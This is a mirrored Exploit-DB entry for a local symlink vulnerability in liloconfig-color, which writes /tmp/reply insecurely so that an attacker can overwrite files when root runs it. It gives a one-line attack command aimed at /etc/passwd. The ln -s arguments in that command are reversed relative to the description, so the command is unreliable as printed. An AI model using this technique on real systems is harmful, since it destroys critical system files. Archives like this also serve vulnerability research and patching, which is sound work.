exploit-db-mirror/exploits/linux/local/19070.txt
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

7 lines
No EOL
397 B
Text

source: http://www.securityfocus.com/bid/77/info
liloconfig-color creates the file /tmp/reply insecurely and follows symbolic links. An attacker can create a symbolic link from /tmp/reply to any file and wait for root to run the program. This will clober the target file.
The file created has permissions -rw-r--r--.
$ ln -s /tmp/reply /etc/passwd
< wait for root to run liloconfig-color >